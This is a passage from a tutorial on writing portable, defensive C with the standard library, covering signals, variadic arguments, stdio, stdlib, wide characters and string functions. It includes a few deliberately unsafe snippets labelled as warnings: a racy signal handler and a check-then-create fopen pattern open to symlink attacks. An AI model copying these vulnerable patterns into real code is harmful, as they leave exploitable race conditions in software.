        /* open a window where a repeat signal could
         * hit the default handler before we reinstall */
        sleep(1);
        signal(SIGINT, &field_int_badly);
        intflag = 1;
        return;
    }

Even our earlier technique of calling signal() right away in the handler isn’t completely safe. The CERT C Coding Standard warns that this leaves a tiny window open for a race condition. They suggest not to use the C library signal functionality at all, but the equivalent POSIX functions instead. POSIX allows you to specify persistence of the handler during initial registration.

Another thing to note is the type declaration of the shared flag (that we called intflag in the example). Exception handlers should read and write only volatile variables. For asynchronous exceptions, volatile alone isn’t even enough. The variable should be small enough that it can be read or written atomically by the processor. The C standard provides the sig_atomic_t typedef for this. Each standard library implementation defines it as an alias for a suitably small integral underlying type.

If you’re writing portable code, don’t assume that sig_atomic_t is anything bigger than a char, and don’t assume its signedness. Thus the portable value range is 0…127, although C99 added macros to determine its min and max values.

The standard says not to call any standard library functions from a signal handler except abort(), exit(), longjmp() or signal(). Certainly avoid any functions that interact with state, like those performing I/O, or else stdio streams can become corrupted.
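The POSIX registration that CERT recommends can be sketched roughly as follows. This is only an illustration, assuming a POSIX system: the helper names install_int_handler and int_was_caught are made up for this example, and the handler again does nothing except set the flag.

```c
#define _POSIX_C_SOURCE 200809L
#include <signal.h>
#include <string.h>

/* the only state the handler touches */
static volatile sig_atomic_t intflag = 0;

static void field_int(int sig)
{
	(void)sig;
	intflag = 1;
}

/* Hypothetical helper: install a SIGINT handler that stays installed.
 * Returns 0 on success, -1 on failure (as sigaction does). */
int install_int_handler(void)
{
	struct sigaction sa;

	memset(&sa, 0, sizeof sa);
	sa.sa_handler = field_int;
	sigemptyset(&sa.sa_mask);
	sa.sa_flags = 0; /* SA_RESETHAND is not set, so no reset to default */
	return sigaction(SIGINT, &sa, NULL);
}

/* Hypothetical helper: lets regular code poll the flag at leisure. */
int int_was_caught(void)
{
	return intflag != 0;
}
```

Because persistence is chosen once at registration, the handler does not need to call signal() on itself, and the window between delivery and re-installation goes away.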
Even though the C standard says it’s OK to call longjmp from a signal handler, CERT gave an example where doing so caused a vulnerability [VU #834865] in Sendmail because it allowed attackers to time a race condition in main() by timing signals.

A program can raise signals for itself with the raise() function. (It used to be called kill.) However longjmp() is less tricky than raising signals for yourself and should be preferred.

The standard library defines this limited list of signals:

    SIGABRT  abnormal termination, such as is initiated by the abort function
    SIGFPE   an erroneous arithmetic operation, such as zero divide or an operation resulting in overflow
    SIGILL   detection of an invalid function image, such as an illegal instruction
    SIGINT   receipt of an interactive attention signal
    SIGSEGV  an invalid access to storage
    SIGTERM  a termination request sent to the program

Using other signals makes a program less portable.

stdarg.h

On the PDP-11 it was easy to walk function arguments with a pointer. The memory layout of arguments was well known, the size of pointers was the same as the size of int, and the original C language could not pass structures by value.

However when spreading to other architectures, C benefited from creating a portable way to access variable numbers of arguments. Non-PDP architectures had complex calling conventions. Using a library for variadic arguments makes code clearer too, whether or not portability is an issue.

Pre-ANSI C on UNIX used <varargs.h>, which required a final “dummy argument.” ANSI C got more picky about arguments matching a declaration, and introduced the “…” token to take the place of the dummy argument, which breaks varargs. The “…” also signals to a compiler that it may want to change the function calling convention.

The committee turned varargs.h into stdarg.h, and generalized the macros to the extent that all known C implementations would be able to handle them with little modification.
This functionality was important for other functions in the standard library like printf and scanf. Using the library is pretty easy, just initialize the list based on the final fixed argument, loop through the args, and release the list. /* add a list of n numbers */ int sum(int n, ...) { va_list ap; int s; va_start(ap, n); for (s = 0; n > 0; --n) s += va_arg(ap, int); va_end(ap); return s; } It is undefined behavior to call va_arg() more times than there are arguments, so the function will need to determine the number of arguments by other means. Our function above consults the n parameter for that information. Speaking of the n variable, we’re not actually passing its value to va_start(), much as it may look. The va_start macro manipulates “n” as merely a name, so it can calculate the address of the next argument. Both va_start and va_arg must be implemented as macros, not as functions. These are the portable assumptions for using stdarg.h: The variadic function must declare at least one fixed argument The function must call va_end before returning (for cleanup on some architectures) va_arg can deal only with those types that become pointers by appending “*” to them. Thus register variables, functions, and arrays can’t be returned by va_arg If a type widens with default argument promotions, then va_arg should request the widened type The last point requires some explanation. When functions had no prototypes in pre-ANSI C, the compiler would promote smaller types to wider ones when sending them to functions. That’s because doing so is essentially free – it costs more to put a byte in a register than to put a word in. Although ANSI requires functions to have prototypes, the promotion rule still applies to variadic arguments. Char and short get expanded to int, and float gets promoted to double. Thus to accept a char argument, ask for its value with va_arg(ap, int) and then cast to char. Don’t do va_arg(ap, char). 
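As a minimal sketch of that last rule, here is a hypothetical helper, gather_chars (a name invented for this example, not from the book or any library), that accepts char arguments by asking va_arg for int and casting back:

```c
#include <stdarg.h>
#include <stddef.h>

/* Hypothetical helper: copy n char arguments into buf and NUL-terminate.
 * The caller must supply room for n + 1 bytes. */
char *gather_chars(char *buf, size_t n, ...)
{
	va_list ap;
	size_t i;

	va_start(ap, n);
	for (i = 0; i < n; i++)
		buf[i] = (char)va_arg(ap, int); /* char arrives promoted to int */
	va_end(ap);
	buf[n] = '\0';
	return buf;
}
```

A call such as gather_chars(out, 3, x, y, z) with three char variables fills out with those characters in order. The same pattern applies to float: request double and convert afterwards.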
To pass a va_list to another function for continued processing either a) memcpy it if you want to consume all arguments in the current function or b) pass a pointer to it if the called function should consume some or all of the arguments. C99 added va_copy() for the first scenario. The implementation of stdarg.h macros is gnarly and entirely platform specific. On my system they resolve to builtin compiler functions. stddef.h Stddef.h is a catchall place for definitions, sort of like stdlib.h. Why make two headers rather than combine them into one? It’s because C can be compiled in either a “hosted” or a “freestanding” environment. The latter is for embedded programming where there isn’t enough room for the entire standard library. An implementation must include all the standard library headers to be considered a hosted environment, while a freestanding environment must include only float.h, limits.h, stdarg.h, and stddef.h. The committee deliberated about putting the things in stddef into the C language itself, but decided the need to extend C is not quite there. Stddef provides ptrdiff_t, size_t, wchar_t, NULL, and offsetof(structname, attrib). Only ptrdiff_t and offsetof are unique to this header. Other headers usually contain duplicates of the other definitions. I used to think that NULL was a reserved word in C, but have come to learn that the constant 0 is actually the crux. The compiler treats 0 specially in a pointer context and transforms it to whatever value represents the NULL pointer on the given architecture (which needn’t be bitwise zero). Thus NULL is typically a macro for ((void *)0). As such it can’t be assigned to a function pointer because data pointers needn’t be the same size as function pointers. Some compilers allow you to do it, but don’t count on it. The reliable method is to cast zero as needed, e.g. (int (*)(void))0. The typedef size_t is an unsigned integral type big enough to hold the size of the largest possible object in memory. 
In some systems that might not be very large, for instance only 64k in the segmented memory model on the Intel 80286. Related rule of thumb: if a variable is going to index an array, it should be type size_t. The typedef ptrdiff_t is a signed integral type of the result of a pointer subtraction. It’s signed because if (p - q) is positive then (q - p) will be negative. Note that if size_t is already the largest integer type, then ptrdiff_t can be no larger, yet the latter loses one bit to hold the sign. So it’s possible to make an array with cells too far apart for ptrdiff_t to measure. (Assuming there is room in memory for such a large single array.) C99 provides a macro SIZE_MAX with the maximum value possible in size_t. C89 doesn’t have it, although you can obtain the value by casting (size_t)-1. This assumes a twos’ complement architecture, which is the most common number representation on modern computers. You can enforce the requirement like this: #include <limits.h> #if ULONG_MAX != -1UL #error "This code requires 2s' complement arithmetic" #endif The offsetof() macro can determine the offset in bytes of a member within its structure. This cannot easily be determined otherwise due to structure padding. The C99 rationale talks about using it to provide “generic” routines that work from descriptions of the structures, rather than from the structure declarations themselves. On many platforms it is defined as: #define offsetof(type, field) ((size_t)(&((type *)0)->field)) That’s undefined behavior, but that’s what the standard library is for: a portable way to do sometimes non-portable operations. stdio.h UNIX I/O was clean and simple compared with other systems of its day. It was 8-bit clean, and used a consistent line terminator. At the edges ioctl() would translate the simple I/O streams for the idiosyncrasies of attached devices. 
The kernel would hold file control state internally and give programs a simple integer descriptor to use when reading and writing.

Leaving UNIX, C ran up against the complexity of I/O on other systems. The X3J11 committee talked with vendors and came away with a sharper understanding of the I/O model they wanted to support. They had to distinguish text and binary modes. DOS used \r\n for line endings. The \r had to be stripped in text mode but not binary mode. UNIX ignores binary mode, but you had better enable it for portability when necessary.

UNIX also had an unusually faithful representation of files. You could put bytes in and expect to read them out unchanged. When doing fully portable I/O keep these caveats in mind:

- A final line without a terminating newline (in text mode) can confuse some systems, and they may drop the line or append a newline.
- Don’t count on the system preserving trailing space in a line. Some systems strip it out.
- Conversely, some systems add a space to a blank line so the line “has something in it.”
- The maximum fully portable line length is 254 characters.
- Implementations are free to pad the end of binary files with a block of NUL characters to make the files match certain disk block sizes.

Another difference between the C standard I/O and UNIX is buffering. In UNIX, people often wrote their own buffering code to reduce the number of relatively costly I/O system calls. The X3J11 committee decided to include this buffering functionality in stdio.

Buffering is an optimization that can be tailored to expected patterns of I/O. The standard library provides the setvbuf() function to change the size and location of a stream’s buffer, as well as choosing between line or block buffering. By default, stdin and stdout are line and block buffered respectively, and stderr is unbuffered. Setvbuf() must be called immediately after a stream is opened, before I/O happens, to have any chance of working.
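A minimal sketch of calling setvbuf() at the right moment. The helper name open_block_buffered is hypothetical and not part of stdio; the sketch also assumes the caller keeps the buffer alive until the stream is closed.

```c
#include <stdio.h>

/* Hypothetical helper: open path for writing and make the stream fully
 * (block) buffered using caller-supplied storage. buf must outlive the
 * stream. Returns NULL on failure. */
FILE *open_block_buffered(const char *path, char *buf, size_t size)
{
	FILE *fp = fopen(path, "w");

	if (fp == NULL)
		return NULL;
	/* called right after fopen, before any I/O on fp */
	if (setvbuf(fp, buf, _IOFBF, size) != 0) {
		fclose(fp);
		return NULL;
	}
	return fp;
}
```

Passing _IOLBF or _IONBF instead of _IOFBF would request line buffering or no buffering. A static array of BUFSIZ bytes is a reasonable buffer for a quick experiment.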
(stdio.h) opening and closing Perhaps surprisingly, there is a lot to learn about just opening files. First there may be a limit on how long a filename can be on a system. Stdio provides the FILENAME_MAX macro with this limit. If the system imposes no practical limit then the macro is just a suggested size. This value could be both too short, or paradoxically too long. If it is set very large then you might end up wasting memory or causing problems if allocating on the stack. Similarly L_tmpnam is the size needed for an array large enough to hold a temporary filename generated by tmpnam(). This function is a security hazard (though it can be useful for generating entropy). It introduces a Time of Check, Time of Use (TOCTOU) race condition because another program or thread could obtain the same temporary file name and create the file first. Use the tmpfile() function instead which actually creates the file, and registers it for removal on normal program exit(). Another common TOCTOU happens with fopen() when trying to create but not replace a file. Programs first check existence, right after which an evildoer can create a symlink of the same name in time for the fopen with “w” mode to overwrite another file with possibly elevated permissions. /* dangerous */ FILE *fp = fopen("foo.txt","r"); /* <-- attacker gets busy here */ if (!fp) { fp = fopen("foo.txt","w"); ... fclose(fp); } else fclose(fp); C99 fixes this with an “x” (exclusive) mode modifier. If exclusive mode is specified (“wx”), the fopen fails if the file already exists or cannot be created. In C89 you can either go beyond the standard library, using the POSIX open() function with the O_CREAT | O_EXCL flags, or just try to keep the time between check and write as small as possible. Once you have opened a file to your liking, or have been given a FILE pointer, treat the pointer as totally opaque. 
Don’t even try to make a copy of the FILE structure because some implementations rely on magic memory addresses for some of them. The CERT standard (FIO38-C) says that the following can cause a crash on some platforms if you try to use my_stdout: /* don't do this */ FILE my_stdout = *stdout; There’s a related function called freopen(), but it’s not used very often. The main use is converting a big program from reading stdin to reading a named file. It’s the simplest way to do that, whereas a new program should just directly fopen whatever file it wants. During a normal program exit, all open files will be closed. Still, it’s useful to explicitly call fclose() on file handles. It helps avoid exceeding the FOPEN_MAX limit of files that can be open at once. Also, failing to properly close files may allow an attacker to exhaust system resources and can increase the risk that file buffers will not be flushed in the event of abnormal program termination. Speaking of flushing buffers, fflush() might force items in the buffer to be processed, but there is no guarantee. For convenience, fflush(NULL) flushes all streams, which is useful in preparation for possible loss of program control, like going into a dangerous section, or telling the user to turn off the computer. Two other quirks. Some operating systems will not actually create a file that you fopen() and fclose() unless you write something. Also you can close stdout or stderr, and there are sometimes reasons to do so! (stdio.h) file navigation Stdio.h has two similar pairs of functions to move around in a file: fgetpos/fsetpos and ftell/fseek. Why the duplication? The second pair represents position as a long integer. When the file is opened in binary mode, this long is the number of bytes from the start of file. This is useful because you can do arithmetic on the integer to jump to particular places. The drawback is that on some systems a long is only 32 bits, so cannot support large files. 
The fgetpos/fsetpos pair works using a special structure that can represent positions in huge files. You must treat this structure as a magic bookmark. It’s only obtainable from a call to fgetpos; you cannot construct your own to point to a position where you haven’t already been.

Stdio also includes a rewind() function, but don’t use it. It actively clears the error indicator for a stream. Instead do a fseek(stream, 0L, SEEK_SET).

These navigation commands were interesting to me, so I created a project called randln to experiment with different ways of picking a random line from a text file. You might find it interesting to look at the pros and cons of each method as explained in the readme.

You can actually inspect I/O as it happens. The trick is to walk the program through a debugger while tracing its system calls in another terminal. To use that randln program as an example:

First start it in the debugger. Enable tracing for the debugger’s I/O and that of its children.

    ktrace -i -ti gdb randln

Put a breakpoint in the line-finding function and start the program. In another terminal find the PID of randln that was launched by gdb, and start tailing the ktrace dump. This command will show the first 20 bytes of data in each I/O request:

    kdump -m 20 -l -p <pid>

Now step through the program in the debugger and watch the consequences of each statement.

A final note about stream navigation and the shell. I noticed that when doing foo <bar the program can perform fseeks on bar, but cat bar | foo cannot. It’s another reason not to abuse cat.

(stdio.h) reading and writing

The foundation of all stream input is fgetc(). The other standard library input functions must be implemented as if they call it repeatedly, even if they don’t. It pulls a character out of a stream (or a character that was pushed back by ungetc() if such exists), and refills the stream buffer if needed.
Some platforms allow ungetc() to push back a whole stack of characters, but the portable assumption is that it can store only one.

While fgetc is a function, getc() is a macro that avoids incurring a function call just to get a character. The downside is that getc() is allowed to evaluate its argument more than once, so don’t do anything with a side effect there. Now, fgetc() is allowed to be a macro too, but may not be as efficient because it has less freedom in its implementation. It is not permitted to evaluate its argument twice.

Moving up the food chain we come to gets(), which reads characters into a string until it encounters a newline or end-of-file, with no way to limit the length – it’s a buffer overflow waiting to happen. It was removed in C11.

The fgets() function is better because you can specify a max length. However if it fails, the contents of the array being written are indeterminate. It is necessary to reset the string to a known value to avoid errors on subsequent string manipulation functions.

The fread/fwrite functions work in chunks. My only notes about them are

    /* prefer this */
    fread(buf, 1, size*n, stream)

    /* over this */
    fread(buf, size, n, stream)

The second form is worse because you can’t detect whether it read an extra size-1 characters past what it reports. Also some implementations of fread (fwrite) simply call fgetc (fputc) in a loop, whereas others are more optimized. Doing a straight UNIX read (write) can be faster.

The standard library doesn’t allow alternating reads and writes without intervening operations to flush or explicitly position the stream:

- after writing, call fseek(), fsetpos(), rewind(), or fflush() before reading
- after reading, call fseek(), fsetpos(), or rewind() before writing, unless the file is at EOF: a read that hits EOF can be followed immediately by a write

The last thing I wanted to mention about reading and writing is a freak consequence of weird machines.
On some digital signal processors (or more generally on the DeathStation 9000), both char and int are 32 bits. This causes a vulnerability in the common pattern:

    int c;
    while ((c = getchar()) != EOF)
        ...;

There is no extra room in the int type to hold EOF as distinct from a valid character code, so a valid character can make the loop stop early. It’s a high severity bug, a variation of which caused a nasty vulnerability in the bash shell, CA-1996-22.

Fine, you say, you don’t plan to target such machines!

    #include <limits.h>

    #if UCHAR_MAX == UINT_MAX
    #error "Your machine is weird."
    #endif

Also you’ll be careful not to indicate a parse failure with an unsigned code that casts to a signed value of EOF.

Well the same logic can still trick you in C99 with wide characters if you’re not careful. It works like this: the fgetwc(), getwc(), and getwchar() functions return a value of type wint_t. This value can represent the next wide character read, or it can represent WEOF, which indicates end-of-file for wide character streams. On most implementations, the wchar_t type has the same width as wint_t, and these functions can return a character indistinguishable from WEOF.

For this situation be sure to check after the loop for feof() and ferror(). If neither happened then you’ve received a wide character that resembles WEOF. It’s yet another place where wide character implementations are half baked.

(stdio.h) formatting

Scanf and printf have formatting options I hadn’t seen before. First of all they can limit the length of strings they read or write.

    /* limit to 10 characters */
    printf("%.10s", big_string);

    /* or limit to n characters */
    printf("%.*s", n, big_string);

    /* limit to 10 characters */
    scanf("%10s", input);

I used to think scanf was very unsafe, but this limiting helps.

Scanf also supports “scansets” to match strings containing specific characters. Here is how to match up to ten vowels: %10[aeiou]. Scanf also allows you to match but not capture, using *. E.g. %*d.
The %n option saves the number of characters read so far in the scan.

Finally, in C99 printf has modifiers for size_t (%zu) and ptrdiff_t (%td). Because they are typedefs which change by architecture there is otherwise no way to specify them portably.

stdlib.h

Stdlib is a hodgepodge. It has six categories of functions inside:

- algorithms (search, sort, rand)
- integer functions
- number parsing
- multibyte conversions
- storage allocation
- environmental interactions

(stdlib.h) random numbers

Let’s start with an interesting topic: random numbers. The standard library provides a rand() function to generate a pseudorandom sequence starting from a seed specified by srand(). The numbers range from 0 to RAND_MAX.

The first problem is that RAND_MAX can be very small (~ 65535) on some platforms. The second problem is that the quality of rand() is generally not very good on most platforms. On Mac OS it is horrible. Changing the random seed by only a small amount (such as seeding by the epoch) leads to similar initial random values.

    seed        1st rand
    1500000000  1189467867
    1500000001  1189484674
    1500000002  1189501481
    1500000003  1189518288
    1500000004  1189535095
    1500000005  1189551902
    1500000006  1189568709
    1500000007  1189585516
    1500000008  1189602323
    1500000009  1189619130

Rather than rely on whatever implementation of rand you get on a given architecture, it’s just as easy to define your own xorshift rand function. The one below is due to Chris Wellons who arrived at the constants through an exhaustive search.

    static unsigned long g_rand_state = 0;

    /* assumes 64-bit longs */
    unsigned long defensive_rand(void)
    {
        g_rand_state ^= g_rand_state >> 30;
        g_rand_state *= 0xbf58476d1ce4e5b9UL;
        g_rand_state ^= g_rand_state >> 27;
        g_rand_state *= 0x94d049bb133111ebUL;
        g_rand_state ^= g_rand_state >> 31;
        return g_rand_state;
    }

One problem is that these 64-bit constants limit portability. You can portably assume only that longs are at least 32 bits. (C99 gives us long long for 64-bit values.)
Chris provides 32-bit rand functions to choose from as well. Luckily the compiler should fail with an error like “integer literal is too large to be represented in any integer type” rather than accepting the program and creating bugs. Now we have a good rand() function, but how should we seed g_rand_state with an initial value? The typical way is to gather the epoch from time(NULL), but it will mean the application will use the same seed if run more than once per second. There are two other sources of entropy available from the standard library. One is hashing the path generated by tmpnam(), which in many implementations consults the process ID or a higher precision clock. The second is hashing the address of the main function, which is often fairly unpredictable due to address space layout randomization (ASLR). Using the address of main numerically is a little tricky. C99 has a type called intptr_t which can hold pointer values as an integer, but this type is for data pointers only, not function pointers which on some architectures have a different size. We might consider casting a pointer to main as (char *) and reading the bytes, but for the same size reason this isn’t feasible. What we can do is create a function pointer to main, point another pointer at it and read the value out byte by byte. A pointer-to-function-pointer is just a data pointer and can be cast to (void *). int (*p)(int, char**) = &main; unsigned char bytes[sizeof(p) + 1] = { 0 }; memcpy(bytes, (void*)&p, sizeof(p)); The bytes array is a NUL terminated string and can be hashed. To see these techniques in action and how to combine the entropy, check out rand.c. If you’re willing to use functions beyond the C standard library, POSIX provides a random() function that is higher quality, and OpenBSD provides arc4random() which returns crypto-grade randomness. (stdlib.h) integer functions In C89 the rounding of integer division isn’t fully specified. 
When either the numerator or the denominator is negative, the result may round either toward zero or downward. It matches whatever the underlying hardware does. The committee didn’t want to introduce overhead on any system going against the hardware convention.

In C99 they changed their mind, reasoning that Fortran (known for numerical programming) defines the rounding. C99 rounds toward zero. To match this behavior in C89, use the div and ldiv functions. They return structures div_t and ldiv_t that contain both the quotient and remainder of the division.

The only reason to use these functions in C99 is for efficiency, because the functions may be implemented with a compiler builtin that can compute the quotient and remainder together in a single assembly instruction.

A note about the ato{i,l,f} functions – their behavior is undefined if the input cannot be parsed correctly. These functions need not even set errno. Except for behavior on error, atoi is equivalent to (int)strtol(nptr, (char **)NULL, 10). The strto{d,l,ul} functions should always be preferred, because they provide proper error reporting and choice of base.

The implementation of strtod in Plauger’s book was very careful about floating point overflow. It processed digits in groups of eight and then combined them later into a final result. It also consulted the decimal_point attribute set by the LC_NUMERIC part of the current locale.

(stdlib.h) memory

An interesting bit of history: malloc used to be considered a low-level UNIX function, while calloc (“C alloc”) was conceived as the portable C version. However the committee standardized malloc too because it has less overhead (doesn’t zero the memory). Nowadays it seems malloc is more popular. There also used to be a cfree, but it was identical to free and didn’t make the cut for ANSI C.

The most flexible allocation function is realloc because it can simulate both malloc and free.
When passed NULL for the original pointer it behaves like malloc, and when passed 0 for requested size it acts like free. (stdlib.h) termination and execution Stdlib contains the EXIT_FAILURE and EXIT_SUCCESS macros with implementation defined integer values to indicate success or failure on exit. These values would be returned by main or passed to exit(). The C standard actually treats return 0 in main or exit(0) specially, and maps it to whatever the system specific success code is. (Similar to how 0 in a pointer context is treated specially as the NULL value the way we talked about earlier.) Thus you don’t need to include stdlib.h just to return successfully. EXIT_FAILURE is necessary for portably indicating failure, though. The raw value 1 is considered successful on some platforms. Speaking of exit(), it causes “normal” termination. It closes all open file handles, deletes files created by tmpfile(), and calls any handlers registered by atexit() in reverse order of their registration. The abort() function, on the other hand, causes immediate and “abnormal” termination. It needn’t flush buffers, remove temp files, or close open streams. It can be canceled by catching SIGABRT. Aborting can be useful because it will cause a core dump if the OS is configured to save one. Thus the assert() function calls abort() to produce a core file to debug assertion failure. Stdlib.h provides the system() function to run a command in the shell. If the command is a NULL pointer, system() will return non-zero if the command interpreter is available, and zero if it is not. The CERT standard says system() is a security violation and flat out says not to call it. It’s easy to make a mistake with system(). Commands that are not fully pathed can be overridden, and even relative paths can be tricky if the attacker can control the current directory. And of course unsanitized input can attack through the shell. CERT suggests using execve() in POSIX to call fully pathed executables. 
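As a rough illustration of the CERT advice above, here is a minimal sketch of running a fully pathed executable without going through the shell. It assumes a POSIX system; the helper name run_program and the minimal PATH value handed to the child are hypothetical choices made for this example, not something taken from CERT or the original article.

```c
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical helper: run the executable at an absolute path with an
 * explicit argument vector and a small fixed environment, bypassing the
 * shell entirely. Returns the child's exit status, or -1 on failure. */
int run_program(const char *path, char *const argv[])
{
    /* Assumed minimal environment; adjust for the program being run. */
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
    pid_t pid;
    int status;

    if (path == NULL || path[0] != '/')   /* insist on a fully pathed executable */
        return -1;

    pid = fork();
    if (pid < 0)
        return -1;                        /* fork failed */

    if (pid == 0) {
        execve(path, argv, envp);         /* replaces the child process image */
        _exit(127);                       /* only reached if execve failed */
    }

    if (waitpid(pid, &status, 0) < 0)
        return -1;

    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

Because the arguments are passed as a vector rather than a command string, nothing is interpreted by a shell, so user-supplied text in argv cannot inject extra commands. Rejecting relative paths sidesteps the PATH and current-directory tricks mentioned above.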
(stdlib.h) wchar_t OK, this is going to get complicated. The takeaway is that the C standard library cannot portably handle Unicode. You’ll need a good third-party library. Let’s see why this is. Before locales and all that, C was designed for 7-bit ASCII text. The committee endorsed the use of locales to specify a codepage that reassigned the meaning of extra characters using all eight bits (the minimum allowed size of char). However some languages use more than 255 symbols (+ NUL). There were two ways to handle bigger alphabets: use bigger chunks of memory to hold each character code, or define special sequences of single byte characters to stand for extended characters. These approaches are called “wide characters” and “multibyte characters.” Generally because networking equipment and disk storage is byte oriented, programs use multi-byte character encoding for communication with the outside world and storage. However for in-memory use people felt that using wide characters would be cleaner, because each cell in an array would map to exactly one character, like in the old ASCII string days. The C89 standard is not very helpful with multibyte or wide character encoding. It merely set the stage with a wchar_t type for wide characters, and functions in stdlib.h to convert multibyte to wchar_t (mbstowcs) and the reverse (wcstombs) based on the locale. The committee was waiting to see how people wanted to work with international characters before standardizing it. K&R 2nd edition does not list these functions but Plauger and the C89 spec have them. The whole idea was that locale-specific multibyte to wide character conversion was supposed to be more general than any particular encoding system. However, nowadays Unicode has proven to be more popular than other encodings. The multibyte UTF-8 encoding is the standard interchange on the web, and the UCS-4 character set is up to the task of handling all the world’s languages and then some. Should be no problem, right? 
Well, at the time C99 was being standardized, the Unicode consortium (actually the contemporaneous European ISO committee) was endorsing the more limited Universal Coded Character Set UCS-2. The codepoints for UCS-2 are 16 bits, so that’s the minimum width that C99 requires for wchar_t. Sadly the committee made their decision shortly before four byte UCS-4 was proposed (ISO 10646). Vendors like Microsoft jumped into Unicode right away and implemented wchar_t as 16 bits. It’s deep in their APIs and they’re now stuck with that size for backward compatibility. Even Mac OS and iOS use 16 bit wchar_t for whatever reason.

UTF-16 combines the worst of multibyte characters and wide characters. a) Characters outside the “base multilingual plane” require two UTF-16 codepoints (called a surrogate pair) to represent them. This breaks the one-character-one-codepoint assumption. b) It’s wasteful of memory because even ASCII characters take two bytes.

C99 provides wide character versions of the ctype functions, in <wctype.h>, but they simply cannot work properly with surrogate pairs. For example (as pointed out here):

    0xD800 0xDF1E = U+1031E is a letter (iswalpha should be true)
    0xD800 0xDF20 = U+10320 is not a letter (iswalpha should be false)
    0xD834 0xDF1E = U+1D31E is not a letter (iswalpha should be false)
    0xD834 0xDF20 = U+1D320 is not a letter (iswalpha should be false)
    0xD835 0xDF1E = U+1D71E is a letter (iswalpha should be true)
    0xD835 0xDF20 = U+1D720 is a letter (iswalpha should be true)

Neither the first nor the second element of the pair alone can predict whether the resulting Unicode character is alphabetic. There is no way that a system can provide this information through a function ‘iswalpha’ that takes a single wchar_t argument.

C99 does guarantee a macro will be present when the current environment is ISO 10646 compliant, meaning wchar_t can hold every UCS-4 codepoint.
We can blow up for the other platforms: #ifndef __STDC_ISO_10646__ #error "Your wide characters suck." #endif Even assuming we restrict the code to ISO 10646 systems only, the wctype functions are too crude to deal with the subtleties of international languages. Because of how Unicode characters can join together, it’s infeasible to use pointer arithmetic to calculate “string length” or parse “words” with iswspace() robustly. Some parts of programs can continue to operate on text as an opaque series of bytes. However for other parts that must inspect the characters themselves, you should use a sophisticated Unicode library like ICU or utf8proc. This has the advantage of working with C89, so you won’t be forced to upgrade to C99 just because of text processing. With a good Unicode library we don’t need wide characters. We can use UTF-8 everywhere, even in program memory. That’s the school of thought behind utf8everywhere.org. (stdlib.h) lessons from the code While reading Plauger’s implementation for stdlib, I noticed some tricks worth sharing. The comma operator can be used to group multiple small assignments together under an if statement without needing to add curly braces. if (condition) foo = 1, bar = 2; Also an if statement with no statements can be used to shrink a big expression in another if statement: if (cond) ; else if (big cond) foo; C89 allows bare blocks inside a function to segregate variable declarations near the code that uses them. The variables are not accessible outside the block. It can help readability to know when variables are no longer needed, although you might argue that it suggests the function as a whole is too big. 
    #include <stdio.h>

    int main(void)
    {
        puts("Hello.");
        {
            int i = 0;
            printf("%d\n", i);
        }
        /* error: use of undeclared identifier 'i' */
        printf("%d\n", i);
    }

Speaking of brackets, Plauger uses Whitesmiths style indentation, with brackets indented to the level of their code:

    if (cond)
        {
        foo();
        while (cond)
            {
            bar();
            baz();
            }
        }

I find it difficult to read (probably just unfamiliar), but it does have an internal consistency. The brackets are wrapping up multiple statements into a single unit, and this unit is indented the same way that a single statement would be. Still not going to indent this way, but just saying.

Another interesting trick is negating an unsigned number. Plauger does that to consolidate code for signed and unsigned numbers in the same function.

    unsigned long _Stoul(const char *, char **, int);

    #define atoi(s) (int)_Stoul(s, NULL, 10)
    #define atol(s) (long)_Stoul(s, NULL, 10)
    #define strtoul(s, endptr, base) _Stoul(s, endptr, base)

This _Stoul() function negates its unsigned long value if the string it is parsing has a negative sign. This operates bitwise on an unsigned value the same as it would on signed, and after casting for atoi and atol it will be negative as expected. I didn’t know it was “allowed,” but C doesn’t care.

string.h

This header is divided between functions starting with str- and those starting with mem-. The former work with NUL terminated strings, and the latter operate with explicit lengths. Some of the str- functions have a modifier to limit length (strncat, strncmp, strncpy) or a modifier to work backward (strrchr). However the header doesn’t have all permutations. For instance there is no strnlen or memrchr.

Why does strchr take an int rather than a char for its search character? Same with memset, it takes an int value, but converts it to unsigned char internally.
The spec dictates this. That misleading int signature is for backward compatibility with pre-ANSI code which lacked function prototypes and promoted char arguments to int. Under default argument promotions any integral type smaller than int (or unsigned int) always converts to int. All standard library functions are specified in terms of the “widened” types. It’s just that string.h contains many functions where it is especially apparent. The widened types ensure that most library functions can be called with or without a prototype in scope. Legacy code doesn’t use prototypes, and ANSI C did not want to break backward compatibility. Even if people were willing to update all the legacy code, any legacy modules distributed as compiled object files rather than source would not link properly against functions with changed argument types. Similar rationale lies behind the standard’s guarantee that char pointers and void pointers share the same representation and alignment requirements. Relying on this guarantee allows old code to work with the void* malloc in place of the original char* malloc. (See the C99 Rationale section 7.1.4, Use of Library Functions.)

We’re not done with the type mysteries in string.h. Why is it that strchr casts its int argument to char internally and memchr casts to unsigned char? Well, given that strchr is searching through char*, it makes sense to match the type. But memchr is searching through void*. Why not compare each memory location with char rather than unsigned char? It turns out that the C standard makes special guarantees about unsigned char that make it an ideal type to represent arbitrary binary information. Unsigned char is guaranteed to have no padding bits. All bits contribute to the value of the data. Other types on some architectures include things like parity bits which don’t affect the value itself but do use space.
No bitwise operation starting from an unsigned char value, when converted back into that type, can produce overflow, trap representations or undefined behavior. It can be freely manipulated. Trap representations are certain bit patterns that are reserved for exceptional circumstances, like the NaN value in floating point numbers. Accessing parts of a larger data object with an unsigned char pointer will not violate any “aliasing rules.” The unsigned char pointer will be guaranteed to see all modifications of the data object.

In “Portable C,” Rabinowitz says the char type has a few distinct uses: codeset characters, units of storage, small numbers, and small bit patterns. He recommends regular char for codepoints and small numbers, and unsigned for the others. (In C99 wchar_t might be considered the proper way to represent codeset characters, but we’ve already seen the difficulty there.) Note that Rabinowitz doesn’t specify signed char and unsigned char, but rather plain char and unsigned char. That’s because C does not specify whether plain char is signed or unsigned. We would get a warning trying to pass a definitively signed char* to a function in string.h if the default was unsigned char for that platform.

The next functions that taught me something are memcpy and memmove. The first one blasts bytes from one part of memory to another, possibly taking advantage of machine instructions to do large block copies. It doesn’t check for an overlap between the source and destination, in which situation the results are undefined. C99 marks the source and destination pointers with the restrict qualifier to allow the compiler to optimize under that assumption. Memmove is the slower, more careful brother. It works correctly even if the source and destination areas overlap. It is specified to act as if the source memory is first copied to a separate buffer, then copied into the destination.
